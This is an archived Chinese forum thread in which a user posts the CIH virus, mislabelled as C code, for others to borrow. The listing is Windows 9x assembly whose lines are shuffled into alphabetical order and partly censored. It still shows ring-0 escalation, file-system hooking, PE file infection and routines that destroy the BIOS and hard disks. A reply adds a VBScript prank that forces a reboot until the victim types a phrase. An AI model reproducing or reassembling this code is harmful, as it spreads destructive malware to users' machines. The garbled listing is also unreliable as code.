猫史档案馆


c语言编写的病毒cih

用户:潇洒中二潇洒中二查看:6 回复:8 评论:6 创建时间:2020-07-30T18:28:31


****************************************************************************
.586P
0fh
0h
; ( Not Include the Size of Virus Code Section Table )
; * 'Service Identifier' *
; * ( 128 KB ) *
; * ( 512 Bytes ) *
; * ( 喵 KB ) *
; * ( 喵 KB ) *
; * ( 喵 KB ) *
; * ( 80h Bytes ) *
; * ( 80h Bytes ) *
; * ( Only First Set Size ) *
; * ( Set Pointer of File, *
; * *
; * *
; * *
; * *
; * , and the Section *
; * ------------------------- *
; * ------------------------- *
; * ------------------------- *
; * ------------------------- *
; * ------------------------- *
; * ------------------------- *
; * ------------------------- *
; * ------------------------- *
; * ------------------------- *
; * ------------------------- *
; * ------------------------- *
; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
; * 000E0000 - 000E007F *
; * 000E0000 - 000E01FF *
; * 000E0000 - 000EFFFF *
; * 000E0000 - 000FFFFF *
; * 000F0000 - 000FFFFF *
; * 000F0000 - 000FFFFF *
; * 000FE000 - 000FE07F *
; * 04/26/1998 3. Virus Code doesn't Reload into System. *
; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *
; * 10. The Virus Size is only 656 Bytes. *
; * 2. Modify the Bug of v1.1 *
; * 2. The Virus Modifies IDT to Get Ring0 Privilaege. *
; * 3. Use Better Algorithm, Reduce Virus Code Size. *
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; * 4. The Virus "Basic" Size is only 796 Bytes. *
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
; * 6. When System Opens Existing PE File, the File will be *
; * 7. It is also Infected, even the File is Read-Only. *
; * 8. When the File is Infected, the Modification Date and Time *
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * a Canonicalized Unicode Pathname *
; * Address of Buffer ) *
; * Address of Entry Point *
; * AddressOfEntryPoint to *
; * After Calling pIFSFunc, *
; * Allocate SystemMemory Page to Use *
; * Already Infected !? *
; * Attributes of the File !? *
; * be Writted... *
; * Before Writing My Virus *
; * BIOS Main ROM Data *
; * Call Previous FileSystemApiHook *
; * Call the Function that the IFS *
; * can be Writted... *
; * Close File *
; * Code Section Size in *
; * Code Section Table *
; * Code Size of Merge Virus Code Section *
; * Continue to Run, it Jmups to *
; * Create Date : 04/26/1998 Now Version : 1.2 *
; * Designer : CIH Original Place : TTIT of Taiwan *
; * Disable OnBusy *
; * Do My Virus Exist in System !? *
; * Dynamic Data *
; * EAX = 04h *
; * EBP = D600h ==> Read Data in File *
; * EBX = File Handle *
; * ECX = 04h *
; * EDI = IFSMgr_Ring0_FileIO Address *
; * EDX = 'PE/0/0' Signature of *
; * ESI = DataBuffer Address ==> @8 *
; * ESP => ------------------------- *
; * First Section Code *
; * Former Byte. *
; * Generate Exception Again *
; * Generate Exception to Get Ring0 *
; * Get 'PE/0' Signature *
; * Get Attributes of the File *
; * Get IFSMgr_Ring0_FileIO Address *
; * Get OffsetToNewHeader *
; * Get Some Data from the *
; * Get the File *
; * Hide BIOS Page in *
; * IDT(Interrupt Descriptor Table) *
; * IFSMgr_FileSystemHook *
; * IFSMgr_FileSystemHook Entry Point *
; * IFSMgr_InstallFileSystemApiHook *
; * Image Header in File *
; * ImageFileHeader Pointer's *
; * Implement this Particular I/O *
; * Infected Mark. *
; * Infected, and the File doesn't be Reinfected. *
; * Install My File System Api Hook *
; * IO for EEPROM *
; * IOR Structure of IOS_SendCommand Needs *
; * Is FileName '.EXE' !? *
; * Is Open Existing File !? *
; * Is Open File OK !? *
; * Is PE !? *
; * Is Read-Only File !? *
; * Is the File *
; * it will Jmup to Original Application to Run. *
; * it's Size... ^__^ *
; * Kill All HardDisk *
; * Kill BIOS EEPROM *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill the BIOS Extra *
; * Kill the BIOS Main *
; * Let's Get *
; * Let's Modify the *
; * Let's Read *
; * Let's Restore *
; * Let's Set CF = 1 ==> *
; * Let's Set My Virus *
; * Let's Set the *
; * Let's Set the *
; * Let's Set the *
; * Let's Set Total Virus *
; * Let's Write *
; * Manager Would Normally Call to *
; * Merge All Virus Code Section *
; * Modification History *
; * Modification Time *
; * Modification Time : 05/21/1998 *
; * Modify Read-Only File to Write *
; * Move EDX to the Start *
; * My Virus Entry Point *
; * Need to Restore *
; * Need to Restore File *
; * Need to Restore File Modification *
; * NewAddressOfEntryPoint *
; * NewAddressOfEntryPoint *
; * of Extra BIOS can *
; * of ImageFileHeader, and *
; * of SectionTable in File *
; * of the File also don't be Changed. *
; * Only for Debug *
; * Only Set Infected Mark *
; * Open File *
; * Open File Already Succeed. ^__^ *
; * Original Application to Run. *
; * Original PE Executable File(Don't Modify this Section) *
; * Our OS System should be in NT. *
; * PE(Portable Executable) indeed. *
; * Previous FileSystemApiHook, it will Call the Function *
; * Read All Section Tables *
; * Registers Use Status Now : *
; * Request. *
; * Restore Attributes of the File *
; * Restore File Modification Time *
; * Return Original App to Execute *
; * Return to Ring3 Initial Program *
; * Returned pioreq. *
; * Ring0 Virus Game Initial Program *
; * Ring3 Virus Game Initial Program *
; * ROM Data in Memory *
; * ROM Data in Memory *
; * ROM Data in Memory *
; * Save ESP Register *
; * Section Table End Mark *
; * Set the First Virus *
; * Set Virus Code *
; * Setup Initial Data *
; * Show and Enable the *
; * Show BIOS Page in *
; * Show BIOS Page in *
; * Show the BIOS Extra *
; * So My Cute Virus will not *
; * Specified BCS Character Set. *
; * Stack Dump : *
; * Start to Infect the File *
; * Static Data *
; * Static Data *
; * Structured Exception Handing *
; * that the IFS Manager Would Normally Call to Implement *
; * the 'int 20h' and the *
; * The File is ^o^ *
; * The File isn't also Infected. *
; * The Virus Program Information *
; * them First. ^__^ *
; * this Particular I/O Request. *
; * This Service Converts *
; * Time !? *
; * to 'Call [XXXXXXXX]'. *
; * to a Normal Pathname in the *
; * to File, I Must Restore *
; * to Get Ring0 Privilege... *
; * Total Size of Sections *
; * UniToBCSPath *
; * v1.0 1. Create the Virus Program. *
; * v1.1 1. Especially, the File that be Infected will not Increase *
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *
; * Virus Code to the File *
; * Virus Size *
; * Virus Total Need Memory *
; * Virus Version Copyright *
; * Virus' Infected Mark *
; * VirusCodeSectionTable *
; * VxDCall, VMM Modifies *
; * When Exception Error Occurs, *
; * When Exception Error Occurs, Our OS System should be in *
; * When VirusGame Calls *
; * Windows NT. So My Cute Virus will not Continue to Run, *
; * Write Code to Sections *
; * | EAX | *
; * | EBP | *
; * | EBX | *
; * | ECX | *
; * | EDI | *
; * | EDX | *
; * | EFLAG(CF=0) | *
; * | ESI | *
; * | ESP | *
; * | FileNameBufferPointer | *
; * | Return Address | *
; *****************
; ***********************
; ***********************
; ***********************
; ***********************
; ***********************
; ***********************
; ***********************
; ***********************
; ***********************
; ***********************
; ***********************
; ***********************
; ***********************
; ***********************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; ***************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; *************************************
; ***************************************************
; ***************************************************
; ***************************************************
; *********************************************************
; *********************************************************
; *********************************************************
; *********************************************************
; *********************************************************
; *********************************************************
; *********************************************************
; *********************************************************
; *********************************************************
; *********************************************************
; *********************************************************
; *********************************************************
; *********************************************************
; *********************************************************
; *********************************************************
; *********************************************************
; *********************************************************
; *********************************************************
; *********************************************************
; *********************************************************
; *********************************************************
; *********************************************************
; *********************************************************
; *********************************************************
; *********************************************************
; *********************************************************
; *********************************************************
; ****************************************************************************
; ****************************************************************************
; ****************************************************************************
; ****************************************************************************
; ****************************************************************************
; *==========================================================================*
; *==========================================================================*
; *==========================================================================*
; *==========================================================================*
; + NumberOfSections(??)*SizeOfScetionTable(28h)
; + NumberOfSections(??)*SizeOfVirusCodeSectionTa
; + NumberOfSections(??)*SizeOfVirusCodeSectionTa
; + SizeOfTheFirstVirusCodeSectionTable(04h)
; + SizeOfTheFirstVirusCodeSectionTable(04h)
; + SizeOfVirusCodeSectionTableEndMark(04h)
; + SizeOfVirusCodeSectionTableEndMark(04h)
; Adjust Size of Virus Section Code to Correct Value
; Call Original IFSMgr_InstallFileSystemApiHook
; Call Original IFSMgr_InstallFileSystemApiHook
; cmp [esi+eax-04h], '.EXE'
; cmp [esi+eax-06h], '喵 '
; cmp [esi], '/0PE/0'
; EBX = My Virus First Section Code
; For Doing Minimal VirusCode's Length,
; goto DisableOnBusy
; I Assume NumberOfSections <= 0ffh
; I Save EAX to EBP.
; if ( NotOpenExistingFile )
; Modify IFSMgr_InstallFileSystemApiHook Entry Point
; or al
; Save My Virus First Section Code
; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
; Section can be Read. ==> 40000000h
; Section contains initialized data ==> 00000040h
; Set End Mark
; Size of Following Section Table
; Size of Following Section Table...
; to Link Client FileSystemApiHook
; to Link My FileSystemApiHook
@1 = StopToRunVirusCode
@10 = IOForEEPROM
@2 = MyExceptionHook
@3 = FileSystemApiHook
@4: ;
_PageAllocate = $ ;
add (VirtualSize-@9)[edx], ebx
add [eax], ebp
add [esp+08h], ebp
add al, 40h
add dword ptr [esp], ReadyRestoreSE-ReturnAddressOf
add eax, (ImageBase-@9)[esi]
add eax, 04h
add eax, esi
add ebx, (ImageBase-@9)[esi]
add ebx, (VirtualAddress-@9)[edx]
add ebx, (VirtualSize-@9)[edx]
add ebx, FileSystemApiHook-@4 ;
add ebx, HookExceptionNumber*08h+04h ; ZF = 0
add edi, ebx ; Move Address of Buffer
add edx, 07h ; Move EDX to NumberOfSections
add edx, eax
add edx, edi
add edx, SizeOfScetionTable
add esi, DataBuffer-@7 ; mov esi, offset DataBuffer
add esp, 04h*04h
add esp, 08h*04h
AllocateSystemMemoryPage:
ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame
BooleanCalculateCode = $
call @4 ;
call @5 ;
call [ebx+20h+04h] ; Call pIFSFunc
call ebx
call ebx
call ebx ; VXDCall IFSMgr_Ring0_FileIO
call edi ; VXDCall IFSMgr_Ring0_FileIO
call edi ; VXDCall IFSMgr_Ring0_FileIO
call edi ; VXDCall IFSMgr_Ring0_FileIO
call edi ; VXDCall IFSMgr_Ring0_FileIO
call edi ; VXDCall IFSMgr_Ring0_FileIO
call edi ; VXDCall IFSMgr_Ring0_FileIO
call edi ; VXDCall IFSMgr_Ring0_FileIO
call edi ; VXDCall IFSMgr_Ring0_FileIO
call edi ; VXDCall IFSMgr_Ring0_FileIO
call esi
call esi
call esi
call OldInstallFileSystemApiHook-@3[ebx]
call OldInstallFileSystemApiHook-@3[ebx]
CallUniToBCSPath:
Characteristics = StartOfSectionTable+24h ; DWORD
cli
cli
cli
CloseFile:
cmp [esi+eax-04h], 'EXE.'
cmp [esi+eax-06h], 'KCUF'
cmp dword ptr [ebx+20h+04h+04h], 00000024h
cmp dword ptr [esi], 00455000h
cmp word ptr [ebx+18h], 01h
CodeSizeOfMergeVirusCodeSection = offset $
db ' TTIT'
db '.'
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
db 06dh, 06fh, 0喵h, 065h, 02eh, 00dh, 00dh, 00ah
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
db IFSMgr_RemoveFileSystemApiHook-_PageAllocate
db IFSMgr_Ring0_FileIO-UniToBCSPath
db MajorVirusVersion+'0'
db MinorVirusVersion+'0'
db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook
dd 00010053h ; Use EAX, ECX, EDX, and flags
dd 00400032h
dd 00400041h
dd 00400067h ; Use EAX, ECX, EDX, and flags
dd 00400068h ; Use EAX, ECX, EDX, and flags
dec byte ptr (OnBusy-@7)[esi] ; Disable OnBus
dec edx
dec edx ; and a
dException
DisableOnBusy:
e(08h)
e(08h)
END FileHeader
ENDIF
ENDIF
EndOfWriteCodeToSections:
ExitRing0Init:
FileHeader:
FileNameBufferSize = 7fh
FileSystemApiHook:
HookExceptionNumber = 03h
IF DEBUG
IFSMgr_InstallFileSystemApiHook = $ ;
IFSMgr_RemoveFileSystemApiHook = $
IFSMgr_Ring0_FileIO = $
in al, dx
in System
inc ebx
inc edx
inc esi
inc esi
InstallFileSystemApiHook:
InstallMyFileSystemApiHook:
int 20h ; VMMCALL _PageAllocate
int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook
int 20h ; VXDCall IFSMgr_Ring0_FileIO
int 20h ; VXDCall UniToBCSPath
int HookExceptionNumber ; GenerateException
int HookExceptionNumber ; GenerateException Aga
IOForEEPROM:
iretd
iretd ; Return to Ring3 Initial Program
IsOpenFileOK:
喵e EndOfWriteCodeToSections
喵e SetVirusCodeSectionTableEndMark
jc DisableOnBusy
jc DisableOnBusy
je CallUniToBCSPath
jecxz AllocateSystemMemoryPage
jecxz SetFileModificationMark
jmp [eax] ; Jump to prevhook
jmp ExitRing0Init
jmp LoopOfMergeAllVirusCodeSection
jmp LoopOfWriteVirusCodeToFile
jmp RestoreSE
jmp StartToWriteCodeToSections
jmp WriteVirusCodeToFile
jnc IsKillComputer
jne CloseFile
jne DisableOnBusy
jne DisableOnBusy
jne DisableOnBusy
jne QuitMyVirusFileSystemHook
jz InstallMyFileSystemApiHook
jz IsOpenFileOK
jz OpenFile
jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1
KillHardDisk:
LastVxDCallAddress = IFSMgr_Ring0_FileIO
lea eax, (AddressOfEntryPoint-@8)[edx]
lea eax, (LastVxDCallAddress-2-@9)[esi]
lea eax, (NewAddressOfEntryPoint-@8)[esi]
lea eax, [eax+edi-04h]
lea eax, FileSystemApiHook-@6[edi]
lea eax, InstallFileSystemApiHook-@3[eax]
lea eax, MyVirusStart-@2[esi]
lea ebx, EnableEEPROMToWrite-@10[esi]
lea edi, (MyVirusStart-@9)[esi]
lea edx, [eax+edx+12h]
lea edx, [esi-SizeOfScetionTable]
lea esi, IOForEEPROM-@7[esi]
lea esi, MyExceptionHook-@1[ecx]
loop $
loop $
loop $
loop LoopOfRestoreVxDCallID
loop LoopOfWriteCodeToSections
LoopOfMergeAllVirusCodeSection:
LoopOfRestoreVxDCallID:
LoopOfWriteCodeToSections:
LoopOfWriteVirusCodeToFile:
mov (NewAddressOfEntryPoint-@9)[esi], edx
mov (OriginalAddressOfEntryPoint-@9)[esi], eax
mov [eax+2], edx
mov [eax+4], ebx
mov [eax-04h], ebx
mov [eax], al
mov [eax], al
mov [eax], ebx
mov [eax], ebx
mov [ebx+02h], bp ;
mov [ebx+02h], si ; Entry Point A喵ress
mov [ebx+1ch], eax ; Modify EAX Value in Stack
mov [ebx-04h], bp ;
mov [ebx-04h], si ;
mov [ecx], eax
mov [esi], eax
mov ah, ':'
mov ah, 0d5h
mov ah, 0d6h
mov ah, 0d7h
mov ah, 0e0h
mov al, SizeOfScetionTable
mov ax, 4300h
mov ax, 4301h
mov ax, 4301h
mov ax, 4303h
mov bh, FirstKillHardDiskNumber
mov bp, 0cf8h
mov bp, [ebx-04h] ; Entry Point
mov byte ptr [eax], 20h
mov byte ptr [eax], 60h
mov ch, 0aah
mov cl, (NumberOfSections-@8)[esi]
mov cl, 04h
mov cl, SizeOfImageHeaderToRead
mov cl, VxDCallTableSize
mov di, 0058h
mov dl, 3ch
mov dr0, eax ; Adjust OldFileSystemApiHook A
mov dr0, eax ; Save OldFileSystemApiHook A喵
mov dr0, ebx ; Set the Mark of My Virus Exis
mov dr1, esp
mov dx, 0cfeh
mov eax, (A喵ressOfEntryPoint-@9)[esi]
mov eax, 0d601h
mov eax, 0e5555h
mov eax, 0f5555h
mov eax, [ebx+0ch]
mov eax, dr0 ;
mov eax, dr1
mov eax, ebp
mov eax, ebp
mov eax, ebp
mov eax, fs:[ebx]
mov ebp, [ebx] ; Get Exception Base
mov ebp, eax
mov ebp, offset VirusSize
mov ebx, (PointerToRawData-@9)[edx]
mov ebx, (SizeOfRawData-@9)[edx]
mov ebx, (VirtualSize-@9)[edx]
mov ebx, [eax+10h]
mov ebx, [eax]
mov ebx, [ebx+10h]
mov ebx, edi
mov ebx, edx
mov ebx, esp
mov ecx, (FileModificationTime-@7)[esi]
mov ecx, 0e2aaah
mov ecx, [eax-04h]
mov ecx, dr0
mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
mov edi, (FileModificationTime+2-@7)[esi]
mov edi, 8000384ch
mov edi, [eax]
mov edi, [edi]
mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]
mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi]
mov edx, [ecx]
mov edx, [esi]
mov esi, [eax]
mov esi, eax
mov esi, ecx
mov esp, [eax]
mov esp, dr1
mov OldInstallFileSystemApiHook-@3[eax], edx
mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h
mov word ptr (BooleanCalculateCode-@10)[esi], 100ch
mov word ptr [eax], 20cdh
movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi]
movzx edx, byte ptr (VxDCallA喵ressTable+ecx-1-@9)[es
MyExceptionHook:
MyVirusStart:
NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD
NumberOfRelocations = StartOfSectionTable+20h ; WORD
OldInstallFileSystemApiHook 喵 ?
OnlySetInfectedMark:
OpenFile:
or (Characteristics-@9)[edx], 40000040h
or al, 44h
or esi, esi
OriginalA喵ressOfEntryPoint = $-4 ; App Entry Point to Stack
OriginalAppEXE SEGMENT
out dx, al
out dx, eax
out dx, eax
pIFSFunc:
PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD
PointerToRelocations = StartOfSectionTable+18h ; DWORD
pop dword ptr fs:[ebx]
pop eax
pop eax
pop eax
pop eax
pop eax ; EAX = FileSystemApiHook A喵ress
pop ebp
pop ebx
pop ebx
pop ebx
pop ebx ;
pop ebx ; mov ebx, offset FileSystemApiHook
pop ecx
pop ecx
pop ecx
pop ecx
pop ecx
pop ecx
pop ecx ;
pop ecx ; ECX = NumberOfSections+1
pop edi ; EDI = TotalSizeOfVirusCodeSectionTabl
pop edx
pop esi
pop esi
pop esi
pop esi
popad
popf
popf
prevhook:
push 000000001h ;
push 000000002h ;
push 00000000fh ;
push 00000000h
push 00401000h ; Push Original
push 00h ; Set VirusCodeSectionTableEndMark
push 01h ; Size
push 0c0001000h
push 0ffffffffh ;
push dword ptr [ebx+20h+04h+14h] ; Push pioreq
push dword ptr [esp+8]
push eax
push eax
push eax ;
push eax ;
push eax ; A喵ress of Buffer
push eax ; A喵ress of Buffer
push eax ; Pointer of File
push eax ; Size
push ebp
push ebx
push ebx
push ebx
push ebx
push ebx ; Pointer of File
push ebx ; Save File Handle
push ebx ; Size
push ebx ; Size
push ecx
push ecx
push ecx
push ecx ;
push ecx ;
push ecx ;
push ecx ;
push edi ; A喵ress of Buffer
push edi ; A喵ress of Buffer
push edi ; A喵ress of Buffer
push edi ; Size
push edx ; Pointer of File
push edx ; Pointer of File
push edx ; Pointer of File
push esi
push esi
push esi
push esi ; Push FileNameBuffer A喵ress to Stack
push FileNameBufferSize
pushad
pushf
pushf
pushf ; Now CF = 0, Push Flag to Stack
QuitLoopOfMergeAllVirusCodeSection:
ReadyRestoreSE:
rep movsb
ress
RestoreSE:
ret
ret
ret ; Return to Original App Entry Point
ReturnA喵ressOfEndException = $
s
SetFileModificationMark:
SetVirusCodeSectionTableEndMark:
shr ebp, 16 ; Restore Exception
shr esi, 16 ; Modify Exception
sidt [esp-02h] ; Get IDT Base A喵ress
SizeOfScetionTable = Characteristics+04h-SectionName
ss
StartToWriteCodeToSections:
stc ; Enable CF(Carry Flag)
sti
StopToRunVirusCode:
sub eax, 08h
sub eax, 08h
sub eax, edx
sub ebp, ebx
sub ebx, (VirtualSize-@9)[edx]
sub esp, 2ch
test cl, 01h
test cl, 01h
UniToBCSPath = $
VirusGame ENDS
VirusGame SEGMENT
VirusGameDataStartA喵ress = VirusSize
VirusNeedBaseMemory = $
VirusSize = $
VirusTotalNeedMemory = @9
VirusVersionCopyright db 'CIH v'
VxDCallA喵ressTable db 00h
VxDCallIDTable 喵 00010053h, 00400068h, 00400041h, 00400032h
VxDCallTableSize = ($-VxDCallIDTable)/04h
WriteVirusCodeToFile:
xchg eax, edi
xchg eax, edi
xchg eax, edi
xchg eax, edi
xchg ebx, eax ; mov ebx, FileHandle
xchg ecx, eax
xchg ecx, eax ; ECX = Size of Section Table
xchg edi, eax ; EDI = SystemMemory Start A喵r
xchg edx, ebp
xchg edx, ebp
xchg edx, ebp
xchg edx, ebp
xor ah, ah
xor eax, eax
xor eax, eax
xor eax, eax
xor ebx, ebx
xor ebx, ebx
xor ebx, ebx
xor ebx, ebx
xor ecx, ecx
xor ecx, ecx
xor ecx, ecx
xor edx, edx
xor edx, edx

用c语言编写了一个病毒是cih病毒,可以借鉴,给赞哦,是作品emotion_编程猫_点赞


回复

上一页1 页 / 共 1下一页
白篮白篮

这是c?

点赞0


评论


盒子里的旗木盒子里的旗木

人才!!!!!

点赞0


评论


四季的板板四季的板板

前几个语句好像是要挤爆磁盘的赶脚

点赞0


评论


四季的板板四季的板板

set ws=createobject("wscript.shell")
call shutdown(1)
do while a<>"我喵"
a=inputbox("快在下面的框框里输入我喵,否则后果自负,快输""我喵"" ","输不输","")
loop
call shutdown(2)
msgbox "早说就行了嘛",4096+喵
msgbox"再输一遍我喵!",4096+喵
msgbox"我喵!",4096+喵
MsgBox"最后一次!",4096+喵
MsgBox"如果你很快的点过去,不看的话",4096+喵
MsgBox"我就要你踩我空间的!哼!",4096+喵
MsgBox"从前有座山!",4096+喵
MsgBox"山里有个庙.",4096+喵
MsgBox"庙里有个老和尚在讲故事.",4096+喵
ws.run"iexplore.exe http://www.喵"
msgbox"哎呀累了!数绵羊哄我睡觉",4096+喵
for i=1 to 100
MsgBox i&"只绵羊",4096+喵
next
msgbox"哎呀我困了,这次就饶过你吧,下次注意哦!",4096+喵
msgbox"最后问个问题,我是不是大好人!",4096+喵
if inputbox("是不是","请选择","是")<>"是" then
call shutdown(1)
end if
sub shutdown(s)
select case s
case 1
ws.run"cmd.exe /c shutdown -r -t 60 -c",0
case 2
ws.run"cmd.exe /c shutdown -a",0
end select
end sub

木马进阶程序,喵必备,关也关不掉,整人必备

点赞0


评论


Architect_海绵Architect_海绵

你们的都好高级啊

 

点赞0


评论


Architect_海绵Architect_海绵

。。。。。我的直接就发不出来

点赞0


评论


萌新what萌新what

有好几部分被瞄了

点赞0


评论


HeadingForSourceHeadingForSource

下面几行怎么看着像IDA反编译出来的东西?

点赞0


评论